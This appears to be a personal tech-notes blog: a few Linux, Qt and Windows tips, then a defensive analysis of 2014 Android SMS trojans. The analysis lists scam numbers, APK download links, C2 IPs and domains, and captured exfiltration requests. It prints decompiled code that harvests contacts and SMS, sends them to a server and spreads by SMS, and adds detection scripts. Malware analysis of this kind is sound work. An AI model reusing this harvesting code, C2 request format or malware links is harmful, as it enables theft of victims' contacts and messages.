Wednesday, February 16, 2022

Thursday, January 27, 2022

iphone photo path


/private/var/mobile/Media/DCIM/100APPLE/

Sunday, November 21, 2021


Friday, April 02, 2021

linux screen off

 #linux screen off:

DISPLAY=:0  xset dpms force off

#linux screen on:

DISPLAY=:0  xset dpms force on


Sunday, March 14, 2021

fix screen-x.tgz compile error: “configure: error: !!! no tgetent”

(ncurses-devel)

wget http://ftp.gnu.org/gnu/ncurses/ncurses-6.2.tar.gz
tar zxvf ncurses-6.2.tar.gz
cd ncurses-6.2
./configure --prefix=/usr/local/ncurses
make && make install

Sunday, May 26, 2019

Project ERROR: Unknown module(s) in QT: multimedia multimediawidgets


sudo apt-get install qtmultimedia5-dev \
  libqt5multimediawidgets5 \
  libqt5multimedia5-plugins \
  libqt5multimedia5
 

Saturday, May 25, 2019

how to install opencv on ubuntu

https://linuxize.com/post/how-to-install-opencv-on-ubuntu-18-04/

sudo apt install build-essential cmake git pkg-config libgtk-3-dev
sudo apt install libavcodec-dev libavformat-dev libswscale-dev libv4l-dev libxvidcore-dev libx264-dev
sudo apt install libjpeg-dev libpng-dev libtiff-dev gfortran openexr libatlas-base-dev
sudo apt install python3-dev python3-numpy libtbb2 libtbb-dev libdc1394-22-dev

mkdir ~/opencv_build && cd ~/opencv_build
git clone https://github.com/opencv/opencv.git
git clone https://github.com/opencv/opencv_contrib.git

If you want to install an older version of OpenCV, cd to both opencv and opencv_contrib directories and run git checkout

cd ~/opencv_build/opencv
mkdir build && cd build 

cmake -D CMAKE_BUILD_TYPE=RELEASE \
    -D CMAKE_INSTALL_PREFIX=/usr/local \
    -D INSTALL_C_EXAMPLES=OFF \
    -D INSTALL_PYTHON_EXAMPLES=OFF \
    -D OPENCV_GENERATE_PKGCONFIG=ON \
    -D OPENCV_EXTRA_MODULES_PATH=~/opencv_build/opencv_contrib/modules \
    -D OPENCV_ENABLE_NONFREE=ON \
    -D BUILD_EXAMPLES=ON ..


make
sudo make install
sudo ldconfig

pkg-config --modversion opencv4

Saturday, January 07, 2017

How do I fix my taskbar search in Windows 10?


Restart Windows Explorer

As a quick first attempt, restarting Windows Explorer might jump-start the taskbar search into working again.
  1. Right-click the Start button.
  2. Click Task Manager.
  3. Click Windows Explorer. It's located near the bottom of the Task Manager menu.
  4. Click Restart.

Sunday, December 25, 2016

Sunday, December 04, 2016

cannot open include file qmemarray.h


fix:
use qwt6.1.3 (not 4.2.0)
https://sourceforge.net/projects/qwt/files/qwt/6.1.3/

Saturday, December 03, 2016

mspdb100.dll couldn't be found by cl.exe


mspdb100.dll lives in C:\Program Files\Microsoft Visual Studio 10.0\Common7\IDE

fix:
"C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\vcvarsall.bat" x86
 
 

Thursday, July 07, 2016

android display rotate 180 landscape


android display rotate 180 landscape:

modify AndroidManifest.xml

android:screenOrientation="reverseLandscape"

complete:

android:name="xyz.com.demo.MainActivity"    
android:configChanges="orientation"    
android:label="@string/app_name"    
android:screenOrientation="reverseLandscape" 

Sunday, January 31, 2016

Sunday, May 18, 2014

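Android SMS virus:

Step 1. Open "Settings", choose "Security", and then uncheck "Unknown sources" (allow installation of non-Market applications), as shown in the figure below:
With this setting in place, apps can only be installed from Google Play. Even if you tap the goo.gl link in the SMS and download the delivery company's 憑證.apk file, then accidentally tap the downloaded apk file, and then accidentally tap "Package installer" as well, the phone blocks the installer outright and shows the message "Install blocked", as shown in the figure below:
Seen from the other side, if you do want to install a downloaded apk file, you have to check "Unknown sources" before it can be installed.

Cancel the "micropayment" service

For most people this micropayment service does not seem to be of much use...
So call your carrier's customer service and have it turned off! Even if you have not been infected, you should still turn it off...
  • Chunghwa Telecom: dial 800 from a mobile phone, or the customer service line 0800080090
  • Taiwan Mobile: dial 188 (free) from a mobile phone, or 02-66062999
  • Far EasTone: dial 888/123 from a mobile phone, or 449-5888/449-5123 from a landline
Android SMS virus number: 0912104628
Android SMS virus URL: http://goo.gl/4zjSLG
Android SMS virus message: Your court lawsuit

Android SMS virus URL: https://www.dropbox.com/s/l0lqzrtzqh2d6qd/%E9%80%9A%E7%9F%A5%E5%96%AE.apk


Android SMS virus number: 0955164020

Android SMS virus message: Your civil compensation
Android SMS virus URL: http://goo.gl/9Ofdu2
Android SMS virus URL: https://www.dropbox.com/s/09g745brshb6m73/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
通知單.apk
Traffic analysis: http://goo.gl/#analytics/goo.gl/9Ofdu2/all_time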


- Broadcast Receivers
com.example.google.service.MyDeviceAdminReceiver
intent-filter action:android.app.action.DEVICE_ADMIN_ENABLED
com.example.google.service.SMSServiceBootReceiver
intent-filter action:android.intent.action.BOOT_COMPLETED
com.example.google.service.SMSReceiver
intent-filter action:android.provider.Telephony.SMS_RECEIVED
TaskRequest

- Required Permissions
android.permission.READ_PHONE_STATE
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.WRITE_SMS
android.permission.RECEIVE_SMS
android.permission.INTERNET
android.permission.READ_CONTACTS
android.permission.RECEIVE_BOOT_COMPLETED


- Used Permissions
android.permission.SEND_SMS
method call:"Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call:"Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
method call:"Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call:"Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
android.permission.READ_PHONE_STATE
method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getLine1Number()Ljava/lang/String;"
method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getDeviceId()Ljava/lang/String;"
method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSimSerialNumber()Ljava/lang/String;"
method call:"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSubscriberId()Ljava/lang/String;"
android.permission.VIBRATE
method call:"Landroid/support/v4/app/NotificationCompat$Builder/setDefaults(I)Landroid/support/v4/app/NotificationCompat$Builder;" calls"Landroid/app/Notification/Idefaults"
method call:"Landroid/support/v4/app/NotificationCompatHoneycomb/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap;)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call:"Landroid/support/v4/app/NotificationCompatIceCreamSandwich/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call:"Landroid/support/v4/app/NotificationCompatJellybean/(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z Z I Ljava/lang/CharSequence;)V" calls "Landroid/app/Notification/Idefaults"
android.permission.ACCESS_NETWORK_STATE
method call:"Landroid/support/v4/net/ConnectivityManagerCompat/getNetworkInfoFromBroadcast(Landroid/net/ConnectivityManager; Landroid/content/Intent;)Landroid/net/NetworkInfo;" calls "Landroid/net/ConnectivityManager/getNetworkInfo(I)Landroid/net/NetworkInfo;"
method call:"Landroid/support/v4/net/ConnectivityManagerCompatGingerbread/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call:"Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call:"Landroid/support/v4/net/ConnectivityManagerCompat$BaseConnectivityManagerCompatImpl/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
android.permission.CHANGE_COMPONENT_ENABLED_STATE
method call:"Lcom/example/google/service/MainActivity/HideIcon()V" calls"Landroid/content/pm/PackageManager/setComponentEnabledSetting(Landroid/content/ComponentName; I I)V"
android.permission.WAKE_LOCK
method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager/newWakeLock(I Ljava/lang/String;)Landroid/os/PowerManager$WakeLock;"
method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/completeWakefulIntent(Landroid/content/Intent;)Z" calls"Landroid/os/PowerManager$WakeLock/release()V"
method call:"Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager$WakeLock/acquire(J)V"
android.permission.READ_CONTACTS
method call:"Lcom/example/google/service/ContactsHelper/getPhoneContactNumbers()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
method call:"Lcom/example/google/service/ContactsHelper/getPhoneContacts()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
android.permission.INTERNET
method call:"Lcom/example/google/service/HttpHelper/callWS(Ljava/lang/String;)Ljava/lang/String;" calls "Lorg/apache/http/impl/client/DefaultHttpClient/()V"

- Used Features
android.hardware.telephony
android.hardware.touchscreen
net:
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

leak:
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069070000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069108000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

dns:
muc03s07-in-f14.1e100.net 

http:
Request: GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic;10
Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new
Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new

tcp:
173.194.44.14:443
Android SMS virus number: 0926566920
Android SMS virus message: Takkyubin express delivery
Android SMS virus URL: http://goo.gl/6yOcoV (could not download)
Android SMS virus URL: https://www.dropbox.com/s/9llco6cqo0rxyup/%E6%86%91%E8%AD%89.apk?m=
2014-06-02 19:07:04 ERROR 509: Bandwidth Error.
Traffic analysis: http://goo.gl/#analytics/goo.gl/6yOcoV/all_time

Android SMS virus number: 0933398720
Android SMS virus message: Takkyubin express delivery
Android SMS virus URL: http://goo.gl/6fs5jx  (analyzed)
Android SMS virus URL: https://www.dropbox.com/s/rr5xv3qsn7815u0/%E9%9B%BB%E5%AD%90%E8%A1%A8%E5%96%AE.apk?m=
電子表單.apk
Traffic analysis: http://goo.gl/#analytics/goo.gl/6fs5jx/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
Name  Query Type  Query Result  Successful  Protocol
ybbcel888.vicp.cc DNS_TYPE_A 220.136.223.64 udp 
ybbcel999.eicp.net DNS_TYPE_A 220.136.213.43 udp
tcp:220.136.223.64:9090

Ad-Aware Android.Trojan.SMSSend.ND 20140602
AegisLab SUSPICIOUS 20140602
AhnLab-V3 Android-Malicious/Litch 20140602
AntiVir Android/SmsAgent.EB.Gen 20140602
Avast Android:RuSMS-AH [Trj] 20140602
BitDefender Android.Trojan.SMSSend.ND 20140602
DrWeb Android.SmsBot.72.origin 20140602
ESET-NOD32 a variant of Android/TrojanSMS.Agent.ADD 20140602
Emsisoft Android.Trojan.SMSSend.ND (B) 20140602
F-Secure Trojan:Android/SmsSend.IE 20140601
GData Android.Trojan.SMSSend.ND 20140602
Kaspersky HEUR:Trojan-Spy.AndroidOS.SmForw.al 20140602
MicroWorld-eScan Android.Trojan.SMSSend.ND 20140602
Sophos Andr/SMSSend-EC

Android SMS virus number: 0961267359
Android SMS virus message: Takkyubin express delivery
Android SMS virus URL: http://goo.gl/58ooGF (could not download)
Android SMS virus URL: https://www.dropbox.com/s/iweqcsh4vp9g5f3/%E6%86%91%E8%AD%89.apk?m=
憑證.apk
http://goo.gl/#analytics/goo.gl/58ooGF/all_time

Error (509)

This account's public links are generating too much traffic and have been temporarily disabled!

Android SMS virus message:  Black Cat Takkyubin
Android SMS virus URL:  http://goo.gl/em7bab   (analyzed)
[application/vnd.android.package-archive]
Android SMS virus URL:  https://www.dropbox.com/s/plym2gpyohf9n7a/%E6%86%91%E8%AD%89.apk?m=
http://goo.gl/#analytics/goo.gl/em7bab/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
Name  Query Type  Query Result  Successful  Protocol
ybbcel999.eicp.net DNS_TYPE_A 61.228.130.24 udp 
ybbcel888.vicp.cc DNS_TYPE_A 220.136.213.160 udp
Android SMS virus message:  Black Cat Takkyubin (2)
Android SMS virus URL: http://goo.gl/SOkMHW   (analyzed)
Android SMS virus URL:  https://www.dropbox.com/s/zv1f6h6rezcuttt/%E6%86%91%E8%AD%89.apk
http://goo.gl/#analytics/goo.gl/SOkMHW/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
Name  Query Type  Query Result  Successful  Protocol
buyaoa1.vicp.co DNS_TYPE_A 111.249.169.13 udp 
yemian3.vicp.co DNS_TYPE_A 220.136.220.151 udp
tcp:111.249.169.13:9090

Android SMS virus message:  Zhang Ruifen, you applied to pay your electricity bill online
Android SMS virus URL:  http://goo.gl/k0jo8D   (analyzed)
[application/vnd.android.package-archive]
http://goo.gl/#analytics/goo.gl/k0jo8D/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838
Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838
dns:
Name  Query Type  Query Result  Successful  Protocol
ybbcel999.eicp.net DNS_TYPE_A 61.228.130.220 udp 
ybbcel888.vicp.cc DNS_TYPE_A 61.228.131.215 udp

Android SMS virus message:  Your courier delivery receipt notice
Android SMS virus URL:  http://goo.gl/1MN94O   (analyzed)
Android SMS virus URL:  https://www.dropbox.com/s/62556lg017ht0du/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
http://goo.gl/#analytics/goo.gl/1MN94O/all_time

- Native Libraries Loaded
Native Library Name
Trying to load lib /data/data/msc.switchlib.act/lib/libbsvsv.so 0x40516898
Trying to load lib /data/data/msc.switchlib.act/lib/libbsomd.so 0x40516898
dns:

Name  Query Type  Query Result  Successful  Protocol
xdynfa.vicp.co DNS_TYPE_A 211.20.68.250 
boyiis.iego.cn DNS_TYPE_A 114.25.31.243 
android.clients.google.com DNS_TYPE_A 173.194.116.162 173.194.116.163 173.194.116.164 173.194.116.165 173.194.116.166 173.194.116.167 173.194.116.168 173.194.116.169 173.194.116.174 173.194.116.160 173.194.116.161 
162.116.194.173.in-addr.arpa DNS_TYPE_PTR 

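Android SMS virus message:  Takkyubin courier notice
Android SMS virus URL:  wget http://goo.gl/6U6J3B  (could not download)
Android SMS virus URL:  https://www.dropbox.com/s/g4c8e9zp8dqqhk5/%E6%86%91%E8%AD%89.apk?m=
ERROR 509: Bandwidth Error.
http://goo.gl/#analytics/goo.gl/6U6J3B/all_time

Android SMS virus message:  Ruifen found you
Android SMS virus URL:  wget http://goo.gl/976Zaj (could not download)
Android SMS virus URL:  http://211.44.3.186/11/index.php
http://goo.gl/#analytics/goo.gl/976Zaj/all_time

When the link is opened on a computer, the site detects that it is a computer and redirects to a news web page.
When it is opened on a phone, it makes you download the apk file.

Next, let's look at where the IP is registered:
211.44.3.186
A whois lookup shows
it is registered with the Korea Network Information Center.

Obviously a delivery company would not be using a Korean IP.

Android SMS virus message:  You are applying to pay your electricity bill online
Android SMS virus URL:  wget http://goo.gl/UB9zBa (could not download)
Android SMS virus URL:  http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
通知單.apk
http://goo.gl/#analytics/goo.gl/UB9zBa/all_time

Scam SMS text: You are applying to pay online the electricity bill for February of year 103, totalling 367 yuan. If this was not done by you, please view the electronic certificate to cancel http://goo.gl/UB9zBa 

Tapping the link leads to http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk to download the apk. If it is opened and installed, the following appears: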

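Security analysis:

1. This malicious apk can read from the phone the names and phone numbers of the contacts in the address book and the SMS messages, and it uploads the user's mobile number to the IP 203.69.59.153:
[GET] http://203.69.59.153/dong/SMSHandler.ashx?t=s&p=[TelNum]
2. A whois lookup of the IP at http://www.whois365.com/tw/ip/203.69.59.153 
shows that it is an IP administered by Chunghwa Telecom; perhaps a host rented by a customer was compromised?
3. The attacker's sustained attacks were concentrated on the following dates: 3/26: 1706 times, 3/31: 2946 times, 4/3: 3873 times, 4/7: 4869 times. The current total exceeds 31000. (These figures come from the short-URL click statistics report; since alert users do not click, the real number of attacks is higher.) As of this writing, the network service on the compromised IP is still up.
  
The SMS virus has been all the rage lately. Many friends have received messages like this, and my Android phone has received several too.
Since I have been working with Android for quite a while, this is a good chance to put that experience to use and see what this virus actually does.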
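Android APK packages are notoriously easy to decompile. A few years ago a very capable decompilation tool, dex2jar, appeared, and combined with JD-GUI it makes the decompiled source easy to read. Give it a try if you are interested.

If you want to know how to decompile, follow these steps:

1. Install dex2jar and JD-GUI.
2. On the command line, run
        $> dex2jar.sh apkfile
   This produces a file named apkfile_dex2jar.jar in the folder.
3. Open that file in JD-GUI to see the source code.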

-----
Below is a summary of the implementation details of this SMS virus.
The virus obtains the following permissions:

    android.permission.READ_PHONE_STATE
    android.permission.SEND_SMS
    android.permission.READ_SMS
    android.permission.WRITE_SMS
    android.permission.RECEIVE_SMS
    android.permission.INTERNET
    android.permission.CALL_PHONE
    android.permission.READ_CONTACTS
    android.permission.WRITE_EXTERNAL_STORAGE
    com.android.launcher.action.INSTALL_SHORTCUT

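These permissions all relate to SMS and contact data, which matches the virus behaviour we already know about.

From AndroidManifest.xml we can see that it has three key components: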
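        <service android:name=".SMSServices">
            <intent-filter>
                <action android:name="com.example.android.services.SMSServices" />
            </intent-filter>
        </service>

        <receiver android:name="SMSServiceBootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

        <receiver android:name="SMSSender" />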

Every time the phone boots, SMSServiceBootReceiver receives the broadcast, and all it does is start SMSService, so rebooting the phone does not stop the virus.
public class SMSServiceBootReceiver extends BroadcastReceiver
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    Intent localIntent = new Intent();
    localIntent.setAction("com.example.android.services.SMSServices");
    paramContext.startService(localIntent);
  }
}
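
The permission list and the boot receiver described above are enough to triage a suspicious APK from its manifest alone. The following is an added example, not code from the original post: it assumes the manifest has already been decoded to text XML, the sample manifest is constructed from the component names quoted above, and the rule names are hypothetical.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
P = "android.permission."

# Constructed sample: a decoded manifest using the permissions and
# components quoted in the post (package name is a placeholder).
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sample">
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application>
    <service android:name=".SMSServices"/>
    <receiver android:name="SMSServiceBootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name="SMSSender"/>
  </application>
</manifest>"""

# Hypothetical rule names. Each rule fires when every listed permission
# is requested and, if actions are listed, a receiver declares one of them.
RULES = {
    "boot_persistence": (set(), {"android.intent.action.BOOT_COMPLETED"}),
    "sms_and_contacts_exfil": (
        {P + "READ_SMS", P + "READ_CONTACTS", P + "INTERNET"}, set()),
    "sms_self_propagation": ({P + "SEND_SMS", P + "READ_CONTACTS"}, set()),
    "sms_interception": (
        {P + "RECEIVE_SMS"}, {"android.provider.Telephony.SMS_RECEIVED"}),
}


def load_manifest(xml_text):
    """Return (requested permissions, {receiver name: intent actions})."""
    root = ET.fromstring(xml_text)
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    receivers = {}
    for rcv in root.iter("receiver"):
        actions = {a.get(ANDROID_NS + "name") for a in rcv.iter("action")}
        receivers[rcv.get(ANDROID_NS + "name")] = actions
    return perms, receivers


def triage(xml_text):
    """Return the sorted names of the rules that the manifest matches."""
    perms, receivers = load_manifest(xml_text)
    actions = set().union(*receivers.values())
    hits = []
    for name, (need_perms, need_actions) in RULES.items():
        if need_perms <= perms and (not need_actions or need_actions & actions):
            hits.append(name)
    return sorted(hits)


if __name__ == "__main__":
    for hit in triage(SAMPLE_MANIFEST):
        print("flag:", hit)
```

The interception rule stays silent on this sample because no receiver listens for SMS_RECEIVED; the analysis further down describes the inbox being read through SMSObserver instead.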

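The virus's default entry component is MainActivity. On startup it checks whether the APK is being run in an emulator, apparently to avoid having its behaviour tested; this may also have something to do with its server.

As mentioned, SMSService runs when the phone boots. In addition, once we launch the program, SMSService is started as well; basically the point is to make sure SMSService gets running.

SMSService starts SMSObserver and SMSSender, so let's look at these parts next.

SMSObserver looks at all the unread messages in your SMS inbox, extracts the content of the messages you received, and finally sends that content to the remote server, including the following information:

·                     your own mobile number
·                     the sender's mobile number
·                     the message content
·                     the time the message was sent
As for how it is sent: the remote server appears to be a Microsoft-IIS/7.0 server, apparently running a web service written in ASP.NET. Below is the format it sends to the server, using a GET operation. Basically, all subsequent behaviour is reported to this server, and the server returns some content for the client to use. When I tried sending some requests with Postman, however, I did not seem to get anything back; the server may block some abuse of the API, or my HTTP request format may still have been wrong.

        http://101.55.13.43/sms/SMSHandler.ashx?t=r&p=[your mobile number]&a=[friend's mobile number]&m=[message content]&d=[send time]

A request like this going out is really frightening. The remote server presumably records all of this data, which can then be sold as personal information, used as reference for the content of future SMS messages, or even used to improve social engineering. With the Internet, all information now flows quickly, and through a connected device private data can easily be stolen as soon as there is an opening. Frightening.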
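
Because every upload is a plain HTTP GET with the data in the query string, proxy or gateway logs can be searched for it. The following is an added example, not code from the original post: it finds SMSHandler requests in log lines and decodes the leaked fields. The sample lines are constructed from the captures on this page, the kind labels are hypothetical, and reading `d` as epoch milliseconds is an assumption.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qs

# The page shows the handler as SMSHandler.ashx and SMSHandler1.ashx.
HANDLER_RE = re.compile(r"/SMSHandler\d*\.ashx$", re.IGNORECASE)
REQUEST_RE = re.compile(r"\b(?:GET|POST)\s+(\S+)")
HOST_RE = re.compile(r"\bHost:\s*(\S+)", re.IGNORECASE)

# Constructed sample log, modelled on the requests captured on this page,
# plus one unrelated request that must be ignored.
SAMPLE_LOG = [
    "GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113",
    "GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789"
    "&m=Hello%20World!&d=1402069070000 HTTP/1.1 Host: 141.105.65.113",
    "GET http://203.69.59.153/dong/SMSHandler.ashx?t=s&p=15555215554 HTTP/1.1",
    "GET /index.html HTTP/1.1 Host: intranet.example",
]


def classify(params):
    """Label a request by its t value (labels are this example's own)."""
    t = params.get("t", "")
    if t == "r" and {"p", "a", "m"} <= params.keys():
        return "sms_relay"       # an SMS forwarded with both numbers
    if t == "s" and "p" in params:
        return "number_upload"   # the device's own number reported
    return "beacon"              # t=new, t=request: meaning not stated


def parse_line(line):
    """Return a finding dict for an SMSHandler request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not HANDLER_RE.search(url.path):
        return None
    query = parse_qs(url.query, keep_blank_values=True)
    params = {k: v[0] for k, v in query.items()}
    host = HOST_RE.search(line)
    finding = {
        "kind": classify(params),
        "server": url.netloc or (host.group(1) if host else ""),
        "device_number": params.get("p"),
        "peer_number": params.get("a"),
        "message": params.get("m"),
        "sent_at": None,
    }
    d = params.get("d", "")
    if d.isdigit():
        try:  # assumption: d is milliseconds since the Unix epoch
            ts = datetime.fromtimestamp(int(d) // 1000, tz=timezone.utc)
            finding["sent_at"] = ts.isoformat()
        except (OverflowError, OSError, ValueError):
            pass
    return finding


def scan(lines):
    """Return findings for all matching lines, in input order."""
    return [f for f in map(parse_line, lines) if f]


def affected_devices(findings):
    """Map each server to the sorted device numbers that reported to it."""
    out = {}
    for f in findings:
        if f["device_number"]:
            out.setdefault(f["server"], set()).add(f["device_number"])
    return {srv: sorted(nums) for srv, nums in out.items()}


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```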

As for SMSSender: when it is started, it runs the code in the Contact class:
public void Send()
  throws UnsupportedEncodingException, ParserConfigurationException, InterruptedException
{
  ArrayList localArrayList = new ContactsHelper(this._Context).GetAllContacts();
  WebServiceCalling localWebServiceCalling = new WebServiceCalling(this._Context);
  String str1 = Tools.getPhoneNumber(this._Context);
  String str2 = "";
  Iterator localIterator = localArrayList.iterator();
  while (true)
  {
    if (!localIterator.hasNext())
    {
      if (str2.length() > 0)
        localWebServiceCalling.SC(null, str1, str2);
      return;
    }
    String str3 = (String)localIterator.next();
    str2 = str2 + "," + str3;
    if (str2.length() > 20)
    {
      localWebServiceCalling.SC(null, str1, str2);
      str2 = "";
    }
  }
}

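This part looks at the address book on your phone, extracts every contact in it, and sends them to the remote server. The data sent includes:
·                     your own mobile number
·                     the contact's name
·                     the contact's mobile number
In addition, it also sends SMS messages to other contacts: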
localSmsManager.sendTextMessage(str8.trim(), null, str9, null, null);
  localWebServiceCalling.log("SMS", "S", str1, str8 + "|" + str9);

Every 60 seconds it sends your contact data to the remote server and sends SMS messages to other contacts:

public static void sendUpdateBroadcastRepeat(Context paramContext)
{
  PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, SMSSender.class), 0);
  long l = SystemClock.elapsedRealtime();
  ((AlarmManager)paramContext.getSystemService("alarm")).setRepeating(2, l, 60000L, localPendingIntent);
}
Also, for every HTTP GET operation, the content of the HTTP response is passed in a Message to the injected Handler for further processing.
new Thread(new Runnable()
{
  public void run()
  {
    try
    {
      String str = WebServiceCalling.this.callWS(paramString);
      if (paramHandler != null)
      {
        Message localMessage = new Message();
        localMessage.what = paramInt;
        localMessage.obj = str;
        paramHandler.sendMessage(localMessage);
      }
      return;
    }
    catch (UnsupportedEncodingException localUnsupportedEncodingException)
    {
      localUnsupportedEncodingException.printStackTrace();
      return;
    }
